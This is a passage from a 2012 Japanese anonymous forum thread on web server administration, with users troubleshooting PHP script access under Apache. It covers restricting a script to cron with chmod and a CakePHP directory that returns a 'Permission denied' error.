820 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/04/09(月) 10:25:22.24 ]: >>819
する
821 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/04/09(月) 11:13:07.00 ]: 最近は一定以上遅い回線は足切りするのが主流だね。
822 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/04/09(月) 11:18:46.94 ]: ありがとう。
助かった。
823 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/04/16(月) 15:11:55.08 ]: PHPスクリプトをWEB公開ディレクトリに配置した状態で（←これがあまり宜しくないとは思うけど）
ブラウザからはアクセス出来ないけれど
cronからはキック出来る様にはどうしたらいいですか？
824 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/04/16(月) 16:52:06.39 ]: owner を cron から呼ぶアカウントにしといて chmod 700 とか。
825 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/05/23(水) 13:56:45.86 ]: 下記の用にcakePHPを使用したPHPコードを実行させる為に
前準備としてブラウザより各ディレクトリ（ファイル）にアクセス
できることの確認を行っているのですが
なぜかcakephpディレクトリの中にはアクセスする事が出来ません。何が原因なのでしょうか？
※そもそも.htaccessを無効にしたのでアクセス出来なくちゃならないハズなんですが・・・

【ブラウザからアクセスした場合】
◯ localhost/hoge/test.php　
× localhost/cakephp/test.php

【cakephpディレクトリ内のファイル】
/var/www/html/cakephp
test.php
.htaccess → リネーム： htaccess_bk

【コマンドラインから直接スクリプトを叩いた場合】
[root@localhost cakephp]# php test.php
string(4) "test"
826 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/05/23(水) 14:17:16.57 ]: 質問するなら、logと.conf位出したら？
パソコンが動きませんレベルで、解答しろと？
827 名前：825 mailto:sage [2012/05/23(水) 14:30:11.32 ]: >>826
すみません。ログを載せるのが漏れてました。
やはり、
.htaccess を無効にしているのに表示されないのは不思議でなりません。

【Apacheのエラーログ】

[Wed May 23 14:25:00 2012] [error] [client 127.0.0.1] (13)Permission denied: access to /cakephp/test.php denied
828 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/05/23(水) 14:46:43.86 ]: ＞Permission denied: access to /cakephp/test.php denied

logに書いてあるとおり、パーミッション権限の設定によりアクセス不可能。
こんな、中学レベル以下の英語が読めないのはどうかと思う。

[ 新着レスの取得/表示 (agate) ] / [ 携帯版 ]

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef